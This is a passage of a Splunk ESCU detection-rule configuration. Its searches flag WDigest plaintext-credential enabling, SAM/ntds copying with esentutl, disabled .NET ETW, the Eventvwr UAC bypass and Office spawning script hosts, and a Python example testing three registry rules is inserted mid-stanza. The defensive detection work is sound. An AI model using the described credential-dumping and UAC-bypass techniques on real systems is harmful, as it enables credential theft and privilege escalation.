= user,dest action.notable.param.rule_description = This search detects a registry modification that enables RDP on a machine under a different (non-default) port number. 
This technique has been observed in attacks where an adversary attempts lateral movement and remote access to a compromised machine in order to retain control of it. action.notable.param.rule_title = Enable RDP In Other Port Number action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path="*HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp*" Registry.registry_value_name = "PortNumber") BY _time span=1h Registry.dest Registry.user Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)` | where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `enable_rdp_in_other_port_number_filter` [ESCU - Enable WDigest UseLogonCredential Registry - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic detects a suspicious registry modification that enables the WDigest plaintext credential caching feature of Windows (UseLogonCredential set to 1), which makes LSASS keep logon passwords in memory in cleartext. This technique has been used by several malware families and by Mimikatz in order to dump plaintext credentials from the compromised or targeted host. This TTP is a strong indicator that someone intends to dump the credentials of the host, so it is a good pivot point for credential dumping techniques. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1112", "T1003"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic detects a suspicious registry modification that enables the WDigest plaintext credential caching feature of Windows (UseLogonCredential set to 1), which makes LSASS keep logon passwords in memory in cleartext. 
This technique has been used by several malware families and by Mimikatz in order to dump plaintext credentials from the compromised or targeted host. This TTP is a strong indicator that someone intends to dump the credentials of the host, so it is a good pivot point for credential dumping techniques. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the registry value name, registry path, and registry value data from your endpoints. If you are using Sysmon, you must have at least version 2.0 of the official Sysmon TA. https://splunkbase.splunk.com/app/5709 action.escu.known_false_positives = unknown action.escu.creation_date = 2023-04-27 action.escu.modification_date = 2023-04-27 action.escu.confidence = high action.escu.full_search_name = ESCU - Enable WDigest UseLogonCredential Registry - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Credential Dumping", "Windows Registry Abuse", "CISA AA22-320A"] action.risk = 1 action.risk.param._risk_message = WDigest registry value $registry_path$ was modified on $dest$ action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 80}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 80}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Enable WDigest UseLogonCredential Registry - Rule action.correlationsearch.annotations = {"analytic_story": ["Credential Dumping", "Windows Registry Abuse", "CISA AA22-320A"], "cis20": ["CIS 10"], "confidence": 100, "impact": 80, "kill_chain_phases": 
["Exploitation"], "mitre_attack": ["T1112", "T1003"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This analytic detects a suspicious registry modification that enables the WDigest plaintext credential feature of Windows. This technique has been used by several malware families and by Mimikatz to dump plaintext credentials from the compromised or target host. On Windows 8.1, Server 2012 R2 and later the value is absent or 0 by default, so setting UseLogonCredential to 1 makes LSASS retain plaintext credentials for subsequent logons. This TTP is a strong indicator that someone intends to dump credentials on the host, so it is a good pivot for credential dumping techniques. action.notable.param.rule_title = Enable WDigest UseLogonCredential Registry action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path="*\\System\\CurrentControlSet\\Control\\SecurityProviders\\WDigest\\*" Registry.registry_value_name = "UseLogonCredential" Registry.registry_value_data=0x00000001) BY _time span=1h Registry.dest Registry.user Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)` | where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `enable_wdigest_uselogoncredential_registry_filter` [ESCU - Enumerate Users Local Group Using Telegram - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic detects the Telegram process enumerating the local group membership of users. This technique was seen in a Monero-infected honeypot, where it was used to map all the users on the compromised system. 
EventCode 4798 is generated when a process enumerates a user's security-enabled local groups on a computer or device. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1087"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = This analytic detects the Telegram process enumerating the local group membership of users. This technique was seen in a Monero-infected honeypot, where it was used to map all the users on the compromised system. EventCode 4798 is generated when a process enumerates a user's security-enabled local groups on a computer or device. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting the Windows Security Event Log (for example, EventCode 4798) from your endpoints. EventCode 4798 is only written when success auditing is enabled for the Audit User Account Management subcategory. Tune and filter known legitimate processes, such as LogonUI.exe, that generate this event in your environment. action.escu.known_false_positives = unknown action.escu.creation_date = 2023-11-07 action.escu.modification_date = 2023-11-07 action.escu.confidence = high action.escu.full_search_name = ESCU - Enumerate Users Local Group Using Telegram - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Windows"] action.escu.analytic_story = ["XMRig"] action.risk = 1 action.risk.param._risk_message = The Telegram application has been identified enumerating local groups on $dest$ by $user$. 
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 80}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 80}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Enumerate Users Local Group Using Telegram - Rule action.correlationsearch.annotations = {"analytic_story": ["XMRig"], "cis20": ["CIS 10"], "confidence": 100, "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1087"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This analytic detects the Telegram process enumerating the local group membership of users. This technique was seen in a Monero-infected honeypot, where it was used to map all the users on the compromised system. EventCode 4798 is generated when a process enumerates a user's security-enabled local groups on a computer or device. 
action.notable.param.rule_title = Enumerate Users Local Group Using Telegram action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `wineventlog_security` EventCode=4798 Process_Name = "*\\telegram.exe" | stats count min(_time) as firstTime max(_time) as lastTime by user dest EventCode Process_Name Process_ID Account_Name Account_Domain Logon_ID Security_ID Message | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `enumerate_users_local_group_using_telegram_filter` [ESCU - Esentutl SAM Copy - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies the process - `esentutl.exe` - being used to capture credentials stored in ntds.dit or the SAM file on disk. During triage, review parallel processes and determine if legitimate activity. Upon determination of illegitimate activity, take further action to isolate and contain the threat. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1003.002", "T1003"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic identifies the process - `esentutl.exe` - being used to capture credentials stored in ntds.dit or the SAM file on disk. During triage, review parallel processes and determine if legitimate activity. Upon determination of illegitimate activity, take further action to isolate and contain the threat. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. 
To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = False positives should be limited. Filter as needed. action.escu.creation_date = 2021-08-18 action.escu.modification_date = 2021-08-18 action.escu.confidence = high action.escu.full_search_name = ESCU - Esentutl SAM Copy - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Credential Dumping", "Living Off The Land"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Esentutl SAM Copy - Rule action.correlationsearch.annotations = {"analytic_story": ["Credential Dumping", "Living Off The Land"], "cis20": ["CIS 10"], "confidence": 100, "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1003.002", "T1003"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_esentutl` Processes.process IN ("*ntds*", "*SAM*") by Processes.dest Processes.user 
Processes.parent_process_name Processes.process_name Processes.original_file_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `esentutl_sam_copy_filter` [ESCU - ETW Registry Disabled - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic detects a registry modification that disables Event Tracing for Windows (ETW) for the .NET Framework by setting ETWEnabled to 0 under the `SOFTWARE\Microsoft\.NETFramework` key. Adversaries use this to blind EDR and other tooling that relies on .NET runtime ETW events (for example, to observe in-memory assembly loads) and to hide their execution from audit logs. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.006", "T1127", "T1562"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic detects a registry modification that disables Event Tracing for Windows (ETW) for the .NET Framework by setting ETWEnabled to 0 under the `SOFTWARE\Microsoft\.NETFramework` key. Adversaries use this to blind EDR and other tooling that relies on .NET runtime ETW events (for example, to observe in-memory assembly loads) and to hide their execution from audit logs. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the registry value name, registry path, and registry value data from your endpoints. If you are using Sysmon, you must have at least version 2.0 of the official Sysmon TA. 
https://splunkbase.splunk.com/app/5709 action.escu.known_false_positives = unknown action.escu.creation_date = 2023-12-27 action.escu.modification_date = 2023-12-27 action.escu.confidence = high action.escu.full_search_name = ESCU - ETW Registry Disabled - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Hermetic Wiper", "Windows Persistence Techniques", "Windows Privilege Escalation", "Windows Registry Abuse", "CISA AA23-347A", "Data Destruction"] action.risk = 1 action.risk.param._risk_message = Registry value $registry_path$ was set to disable .NET ETW on $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 90}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 90}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - ETW Registry Disabled - Rule action.correlationsearch.annotations = {"analytic_story": ["Hermetic Wiper", "Windows Persistence Techniques", "Windows Privilege Escalation", "Windows Registry Abuse", "CISA AA23-347A", "Data Destruction"], "cis20": ["CIS 10"], "confidence": 100, "impact": 90, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.006", "T1127", "T1562"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This analytic detects a registry modification that disables Event Tracing for Windows (ETW) for the .NET Framework by setting ETWEnabled to 0 under the `SOFTWARE\Microsoft\.NETFramework` key. Adversaries use this to blind EDR and other tooling that relies on .NET runtime ETW events (for example, to observe in-memory assembly loads) and to hide their execution from audit logs. 
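The three registry-value detections above (WDigest UseLogonCredential, the RDP-Tcp PortNumber write, and ETWEnabled) share one shape: a wildcard on registry_path, an exact registry_value_name and, for two of them, a required registry_value_data. The following Python is an added example, not ESCU or Splunk code, that applies those three rules to constructed Sysmon Event ID 13 (RegistryEvent SetValue) style records. It assumes the Sysmon `Details` field renders numeric values as `DWORD (0x00000001)` and normalizes that to an integer before comparison; whether your Sysmon TA performs the same normalization for `registry_value_data` is something to confirm against your own indexed data before relying on the `=0x00000001` comparison. Matching is deliberately case-insensitive because registry paths are.

```python
"""Added example: apply the three ESCU-style registry-value rules above to
constructed Sysmon Event ID 13 (SetValue) records. Not ESCU or Splunk code."""
import re
from fnmatch import fnmatchcase

# One rule per search above: path wildcard, value name, and (optionally) the
# exact value that must have been written. None means any write is of interest.
RULES = [
    {"name": "Enable WDigest UseLogonCredential Registry",
     "path": r"*\System\CurrentControlSet\Control\SecurityProviders\WDigest\*",
     "value_name": "UseLogonCredential", "value_data": 1},
    {"name": "ETW Registry Disabled",
     "path": r"*\SOFTWARE\Microsoft\.NETFramework*",
     "value_name": "ETWEnabled", "value_data": 0},
    {"name": "Enable RDP In Other Port Number",
     "path": r"*HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp*",
     "value_name": "PortNumber", "value_data": None},
]

_NUMERIC = re.compile(r"^(?:DWORD|QWORD)\s*\((0x[0-9A-Fa-f]+)\)$")


def parse_value_data(details):
    """Sysmon renders numeric values as 'DWORD (0x00000001)'; return an int for
    those, otherwise the raw string (REG_SZ, REG_BINARY, ...)."""
    m = _NUMERIC.match(details.strip())
    return int(m.group(1), 16) if m else details


def normalize(event):
    """Map a raw SetValue record onto the CIM Registry fields the searches use.
    Sysmon's TargetObject is the full path including the value name, which is
    why the searches can match both registry_path and registry_value_name."""
    path = event["TargetObject"]
    return {
        "dest": event["Computer"],
        "user": event["User"],
        "registry_path": path,
        "registry_value_name": path.rsplit("\\", 1)[-1],
        "registry_value_data": parse_value_data(event["Details"]),
        "process_guid": event["ProcessGuid"],
    }


def match_rule(rule, rec):
    """Registry paths are case-insensitive, so compare lower-cased strings."""
    if not fnmatchcase(rec["registry_path"].lower(), rule["path"].lower()):
        return False
    if rec["registry_value_name"].lower() != rule["value_name"].lower():
        return False
    if rule["value_data"] is not None and rec["registry_value_data"] != rule["value_data"]:
        return False
    return True


def run_detections(events, rules=RULES):
    """Return (rule name, dest, user, value written) for every matching event."""
    hits = []
    for event in events:
        rec = normalize(event)
        for rule in rules:
            if match_rule(rule, rec):
                hits.append((rule["name"], rec["dest"], rec["user"], rec["registry_value_data"]))
    return hits


# Constructed sample records (hostnames, users and GUIDs are made up).
SAMPLE_EVENTS = [
    {"Computer": "ws01", "User": "CORP\\alice", "ProcessGuid": "{a1}",
     "TargetObject": r"HKLM\System\CurrentControlSet\Control\SecurityProviders\WDigest\UseLogonCredential",
     "Details": "DWORD (0x00000001)"},                       # plaintext creds enabled -> hit
    {"Computer": "ws01", "User": "CORP\\alice", "ProcessGuid": "{a2}",
     "TargetObject": r"HKLM\System\CurrentControlSet\Control\SecurityProviders\WDigest\UseLogonCredential",
     "Details": "DWORD (0x00000000)"},                       # hardening to 0 -> no hit
    {"Computer": "srv02", "User": "CORP\\svc-build", "ProcessGuid": "{b1}",
     "TargetObject": r"HKLM\SOFTWARE\Microsoft\.NETFramework\ETWEnabled",
     "Details": "DWORD (0x00000000)"},                       # .NET ETW disabled -> hit
    {"Computer": "srv02", "User": "CORP\\admin", "ProcessGuid": "{b2}",
     "TargetObject": r"HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\PortNumber",
     "Details": "DWORD (0x00000D3E)"},                       # RDP moved to 3390 -> hit
    {"Computer": "ws03", "User": "CORP\\bob", "ProcessGuid": "{c1}",
     "TargetObject": r"HKCU\Software\SomeApp\PortNumber",
     "Details": "DWORD (0x00000001)"},                       # same value name, wrong path -> no hit
]

if __name__ == "__main__":
    for hit in run_detections(SAMPLE_EVENTS):
        print(hit)
```

The second WDigest record is the interesting negative case: a hardening script that explicitly writes UseLogonCredential=0 touches the same path and value name but is not a hit, exactly as the `registry_value_data=0x00000001` clause intends. The RDP rule has no value constraint, so a write of the default 3389 would also fire; that is where the page's filter macro earns its keep.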
action.notable.param.rule_title = ETW Registry Disabled action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path="*\\SOFTWARE\\Microsoft\\.NETFramework*" Registry.registry_value_name = ETWEnabled Registry.registry_value_data=0x00000000) BY _time span=1h Registry.dest Registry.user Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)` | where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `etw_registry_disabled_filter` [ESCU - Eventvwr UAC Bypass - Rule] action.escu = 0 action.escu.enabled = 1 description = The following search identifies the Eventvwr UAC bypass by correlating a registry modification to the `mscfile\shell\open\command` path with the process that made it. The auto-elevating eventvwr.exe consults that path under HKCU before HKLM when loading eventvwr.msc, and the HKCU key does not exist by default. A successful attack places a suspicious command in that value so that it executes with elevated privileges when eventvwr.msc loads. Upon triage, review the parallel processes that have executed. Identify any additional registry modifications on the endpoint that may look suspicious. Remediate as necessary. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548.002", "T1548"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following search identifies the Eventvwr UAC bypass by correlating a registry modification to the `mscfile\shell\open\command` path with the process that made it. The auto-elevating eventvwr.exe consults that path under HKCU before HKLM when loading eventvwr.msc, and the HKCU key does not exist by default. A successful attack places a suspicious command in that value so that it executes with elevated privileges when eventvwr.msc loads. Upon triage, review the parallel processes that have executed. 
Identify any additional registry modifications on the endpoint that may look suspicious. Remediate as necessary. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Some false positives may be present and will need to be filtered. action.escu.creation_date = 2022-11-14 action.escu.modification_date = 2022-11-14 action.escu.confidence = high action.escu.full_search_name = ESCU - Eventvwr UAC Bypass - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Windows Defense Evasion Tactics", "IcedID", "Living Off The Land", "Windows Registry Abuse"] action.risk = 1 action.risk.param._risk_message = Registry values were modified to bypass UAC using Event Viewer on $dest$ by $user$. 
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 80}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 80}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Eventvwr UAC Bypass - Rule action.correlationsearch.annotations = {"analytic_story": ["Windows Defense Evasion Tactics", "IcedID", "Living Off The Land", "Windows Registry Abuse"], "cis20": ["CIS 10"], "confidence": 100, "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548.002", "T1548"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following search identifies the Eventvwr UAC bypass by correlating a registry modification to the `mscfile\shell\open\command` path with the process that made it. The auto-elevating eventvwr.exe consults that path under HKCU before HKLM when loading eventvwr.msc, and the HKCU key does not exist by default. A successful attack places a suspicious command in that value so that it executes with elevated privileges when eventvwr.msc loads. Upon triage, review the parallel processes that have executed. Identify any additional registry modifications on the endpoint that may look suspicious. Remediate as necessary. 
action.notable.param.rule_title = Eventvwr UAC Bypass action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) AS firstTime max(_time) AS lastTime FROM datamodel=Endpoint.Processes BY _time span=1h Processes.user Processes.process_id Processes.process_name Processes.process Processes.process_path Processes.dest Processes.parent_process_name Processes.parent_process Processes.process_guid | `drop_dm_object_name(Processes)` | join process_guid [ | tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path="*mscfile\\shell\\open\\command\\*") BY _time span=1h Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)`] | fields firstTime lastTime dest user parent_process_name parent_process process_name process_path process registry_key_name registry_path registry_value_name registry_value_data process_guid | where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `eventvwr_uac_bypass_filter` [ESCU - Excel Spawning PowerShell - Rule] action.escu = 0 action.escu.enabled = 1 description = The following detection identifies Microsoft Excel spawning PowerShell. This is not typical or default behavior for Excel.exe, which is generally found under `C:\Program Files\Microsoft Office\root\Office16` (the version folder will vary). PowerShell spawning from Excel.exe is a common and actively used pattern for malicious spearphishing attachments (macro execution). The command executed will most likely be encoded and captured by another detection. 
During triage, review parallel processes and identify any files that may have been written. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1566.001", "T1059.001"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following detection identifies Microsoft Excel spawning PowerShell. This is not typical or default behavior for Excel.exe, which is generally found under `C:\Program Files\Microsoft Office\root\Office16` (the version folder will vary). PowerShell spawning from Excel.exe is a common and actively used pattern for malicious spearphishing attachments (macro execution). The command executed will most likely be encoded and captured by another detection. During triage, review parallel processes and identify any files that may have been written. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = False positives should be limited, but if any are present, filter as needed. 
action.escu.creation_date = 2023-11-07 action.escu.modification_date = 2023-11-07 action.escu.confidence = high action.escu.full_search_name = ESCU - Excel Spawning PowerShell - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Spearphishing Attachments"] action.risk = 1 action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ by user $user$, indicating potential suspicious macro execution. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 80}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 80}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 80}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 80}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Excel Spawning PowerShell - Rule action.correlationsearch.annotations = {"analytic_story": ["Spearphishing Attachments"], "cis20": ["CIS 10"], "confidence": 100, "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1566.001", "T1059.001"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following detection identifies Microsoft Excel spawning PowerShell. This is not typical or default behavior for Excel.exe, which is generally found under `C:\Program Files\Microsoft Office\root\Office16` (the version folder will vary). 
PowerShell spawning from Excel.exe is a common and actively used pattern for malicious spearphishing attachments (macro execution). The command executed will most likely be encoded and captured by another detection. During triage, review parallel processes and identify any files that may have been written. action.notable.param.rule_title = Excel Spawning PowerShell action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count values(Processes.process) min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.parent_process_name="excel.exe" `process_powershell` by Processes.parent_process Processes.parent_process_name Processes.process_name Processes.user Processes.dest Processes.original_file_name | `drop_dm_object_name("Processes")` | `security_content_ctime(firstTime)`|`security_content_ctime(lastTime)` | `excel_spawning_powershell_filter` [ESCU - Excel Spawning Windows Script Host - Rule] action.escu = 0 action.escu.enabled = 1 description = The following detection identifies Microsoft Excel spawning Windows Script Host, `cscript.exe` or `wscript.exe`. This is not typical or default behavior for Excel.exe, which is generally found under `C:\Program Files\Microsoft Office\root\Office16` (the version folder will vary). `cscript.exe` and `wscript.exe` are located by default in `c:\windows\system32\` or `c:\windows\syswow64\`. `cscript.exe` or `wscript.exe` spawning from Excel.exe is a common and actively used pattern for malicious spearphishing attachments. The command line executed will most likely be obfuscated and captured by another detection. During triage, review parallel processes and identify any files that may have been written. 
Review the reputation of the remote destination and block accordingly. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1566.001", "T1059.005", "T1059.007"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following detection identifies Microsoft Excel spawning Windows Script Host, `cscript.exe` or `wscript.exe`. This is not typical or default behavior for Excel.exe, which is generally found under `C:\Program Files\Microsoft Office\root\Office16` (the version folder will vary). `cscript.exe` and `wscript.exe` are located by default in `c:\windows\system32\` or `c:\windows\syswow64\`. `cscript.exe` or `wscript.exe` spawning from Excel.exe is a common and actively used pattern for malicious spearphishing attachments. The command line executed will most likely be obfuscated and captured by another detection. During triage, review parallel processes and identify any files that may have been written. Review the reputation of the remote destination and block accordingly. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = False positives should be limited, but if any are present, filter as needed. In some instances, `cscript.exe` is used for legitimate business practices. 
action.escu.creation_date = 2023-11-07 action.escu.modification_date = 2023-11-07 action.escu.confidence = high action.escu.full_search_name = ESCU - Excel Spawning Windows Script Host - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Spearphishing Attachments"] action.risk = 1 action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ by user $user$, indicating potential suspicious macro execution. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 80}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 80}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 80}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 80}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Excel Spawning Windows Script Host - Rule action.correlationsearch.annotations = {"analytic_story": ["Spearphishing Attachments"], "cis20": ["CIS 10"], "confidence": 100, 